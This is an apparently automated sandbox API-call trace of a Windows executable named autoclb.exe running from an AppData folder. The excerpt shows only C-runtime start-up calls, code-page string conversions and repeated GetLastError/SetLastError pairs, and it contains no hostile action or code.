GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0195.151] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0195.151] SetHandleCount (uNumber=0x20) returned 0x20 [0195.151] GetCommandLineA () returned="\"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe\" " [0195.151] GetEnvironmentStringsW () returned 0x669dd0* [0195.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1359, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1359 [0195.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1359, lpMultiByteStr=0x1fe0fd0, cbMultiByte=1359, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1359 [0195.152] FreeEnvironmentStringsW (penv=0x669dd0) returned 1 [0195.152] GetLastError () returned 0xcb [0195.152] SetLastError (dwErrCode=0xcb) [0195.152] GetLastError () returned 0xcb [0195.152] SetLastError (dwErrCode=0xcb) [0195.152] GetLastError () returned 0xcb [0195.152] SetLastError (dwErrCode=0xcb) [0195.152] GetACP () returned 0x4e4 [0195.152] GetLastError () returned 0xcb [0195.152] SetLastError (dwErrCode=0xcb) [0195.152] IsValidCodePage (CodePage=0x4e4) returned 1 [0195.152] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0195.152] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0195.152] GetLastError () returned 0xcb [0195.152] SetLastError (dwErrCode=0xcb) [0195.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0195.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﴟ@Ā") returned 256 [0195.153] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿﴟ@Ā", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0195.153] GetLastError () returned 0xcb [0195.153] SetLastError (dwErrCode=0xcb) [0195.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0195.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0195.153] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0195.153] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0195.153] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x54\x4c\xfe\x9c\x94\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0195.153] GetLastError () returned 0xcb [0195.153] SetLastError (dwErrCode=0xcb) [0195.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0195.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0195.153] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0195.153] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0195.153] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x54\x4c\xfe\x9c\x94\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0195.153] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x50d980, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adsldraw\\autoclb.exe")) returned 0x3a [0195.153] GetLastError () returned 0x0 [0195.153] SetLastError (dwErrCode=0x0) [0195.153] GetLastError () returned 0x0 [0195.154] SetLastError (dwErrCode=0x0) [0195.154] GetLastError () returned 0x0 [0195.154] SetLastError (dwErrCode=0x0) [0195.154] GetLastError () returned 0x0 [0195.154] SetLastError (dwErrCode=0x0) [0195.154] GetLastError () returned 0x0 [0195.154] SetLastError (dwErrCode=0x0) [0195.154] GetLastError () returned 0x0 [0195.154] SetLastError (dwErrCode=0x0) [0195.154] GetLastError () returned 0x0 [0195.154] SetLastError (dwErrCode=0x0) [0195.154] GetLastError () returned 0x0 [0195.154] SetLastError (dwErrCode=0x0) [0195.154] GetLastError () returned 0x0 [0195.155] SetLastError (dwErrCode=0x0) [0195.155] GetLastError () returned 0x0 [0195.155] SetLastError (dwErrCode=0x0) [0195.155] GetLastError () returned 0x0 [0195.155] SetLastError (dwErrCode=0x0) [0195.155] GetLastError () returned 0x0 [0195.155] SetLastError (dwErrCode=0x0) [0195.155] GetLastError () returned 0x0 [0195.155] SetLastError (dwErrCode=0x0) [0195.155] GetLastError () returned 0x0 [0195.155] SetLastError (dwErrCode=0x0) [0195.155] GetLastError () returned 0x0 [0195.155] SetLastError (dwErrCode=0x0) [0195.155] GetLastError () returned 0x0 [0195.155] SetLastError (dwErrCode=0x0) [0195.155] GetLastError () returned 0x0 [0195.155] SetLastError (dwErrCode=0x0) [0195.155] GetLastError () returned 0x0 [0195.155] SetLastError (dwErrCode=0x0) [0195.155] GetLastError () returned 0x0 [0195.155] SetLastError (dwErrCode=0x0) [0195.155] GetLastError () returned 0x0 [0195.155] SetLastError (dwErrCode=0x0) [0195.155] GetLastError () returned 0x0 [0195.156] SetLastError (dwErrCode=0x0) [0195.156] GetLastError () returned 0x0 [0195.156] SetLastError (dwErrCode=0x0) [0195.156] GetLastError () returned 0x0 [0195.156] SetLastError (dwErrCode=0x0) [0195.156] GetLastError () returned 0x0 [0195.156] SetLastError (dwErrCode=0x0) [0195.156] GetLastError () returned 0x0 [0195.156] SetLastError (dwErrCode=0x0) [0195.156] GetLastError () returned 0x0 [0195.156] SetLastError (dwErrCode=0x0) [0195.156] GetLastError () returned 0x0 [0195.156] SetLastError (dwErrCode=0x0) [0195.156] GetLastError () returned 0x0 [0195.156] SetLastError (dwErrCode=0x0) [0195.156] GetLastError () returned 0x0 [0195.156] SetLastError (dwErrCode=0x0) [0195.156] GetLastError () returned 0x0 [0195.156] SetLastError (dwErrCode=0x0) [0195.156] GetLastError () returned 0x0 [0195.156] SetLastError (dwErrCode=0x0) [0195.156] GetLastError () returned 0x0 [0195.156] SetLastError (dwErrCode=0x0) [0195.157] GetLastError () returned 0x0 [0195.157] SetLastError (dwErrCode=0x0) [0195.157] GetLastError () returned 0x0 [0195.157] SetLastError (dwErrCode=0x0) [0195.157] GetLastError () returned 0x0 [0195.157] SetLastError (dwErrCode=0x0) [0195.157] GetLastError () returned 0x0 [0195.157] SetLastError (dwErrCode=0x0) [0195.157] GetLastError () returned 0x0 [0195.157] SetLastError (dwErrCode=0x0) [0195.157] GetLastError () returned 0x0 [0195.157] SetLastError (dwErrCode=0x0) [0195.157] GetLastError () returned 0x0 [0195.157] SetLastError (dwErrCode=0x0) [0195.157] GetLastError () returned 0x0 [0195.157] SetLastError (dwErrCode=0x0) [0195.157] GetLastError () returned 0x0 [0195.157] SetLastError (dwErrCode=0x0) [0195.157] GetLastError () returned 0x0 [0195.157] SetLastError (dwErrCode=0x0) [0195.157] GetLastError () returned 0x0 [0195.157] SetLastError (dwErrCode=0x0) [0195.158] GetLastError () returned 0x0 [0195.158] SetLastError (dwErrCode=0x0) [0195.158] GetLastError () returned 0x0 [0195.158] SetLastError (dwErrCode=0x0) [0195.158] GetLastError () returned 0x0 [0195.158] SetLastError (dwErrCode=0x0) [0195.158] GetLastError () returned 0x0 [0195.158] SetLastError (dwErrCode=0x0) [0195.158] GetLastError () returned 0x0 [0195.158] SetLastError (dwErrCode=0x0) [0195.158] GetLastError () returned 0x0 [0195.158] SetLastError (dwErrCode=0x0) [0195.158] GetLastError () returned 0x0 [0195.158] SetLastError (dwErrCode=0x0) [0195.158] GetLastError () returned 0x0 [0195.158] SetLastError (dwErrCode=0x0) [0195.158] GetLastError () returned 0x0 [0195.158] SetLastError (dwErrCode=0x0) [0195.158] GetLastError () returned 0x0 [0195.158] SetLastError (dwErrCode=0x0) [0195.158] GetLastError () returned 0x0 [0195.159] SetLastError (dwErrCode=0x0) [0195.159] GetLastError () returned 0x0 [0195.159] SetLastError (dwErrCode=0x0) [0195.159] GetLastError () returned 0x0 [0195.159] SetLastError (dwErrCode=0x0) [0195.159] GetLastError () returned 0x0 [0195.159] SetLastError (dwErrCode=0x0) [0195.159] GetLastError () returned 0x0 [0195.159] SetLastError (dwErrCode=0x0) [0195.159] GetLastError () returned 0x0 [0195.159] SetLastError (dwErrCode=0x0) [0195.159] GetLastError () returned 0x0 [0195.159] SetLastError (dwErrCode=0x0) [0195.159] GetLastError () returned 0x0 [0195.159] SetLastError (dwErrCode=0x0) [0195.159] GetLastError () returned 0x0 [0195.159] SetLastError (dwErrCode=0x0) [0195.159] GetLastError () returned 0x0 [0195.159] SetLastError (dwErrCode=0x0) [0195.159] GetLastError () returned 0x0 [0195.159] SetLastError (dwErrCode=0x0) [0195.159] GetLastError () returned 0x0 [0195.160] SetLastError (dwErrCode=0x0) [0195.160] GetLastError () returned 0x0 [0195.160] SetLastError (dwErrCode=0x0) [0195.160] GetLastError () returned 0x0 [0195.160] SetLastError (dwErrCode=0x0) [0195.160] GetLastError () returned 0x0 [0195.160] SetLastError (dwErrCode=0x0) [0195.160] GetLastError () returned 0x0 [0195.160] SetLastError (dwErrCode=0x0) [0195.160] GetLastError () returned 0x0 [0195.160] SetLastError (dwErrCode=0x0) [0195.160] GetLastError () returned 0x0 [0195.160] SetLastError (dwErrCode=0x0) [0195.160] 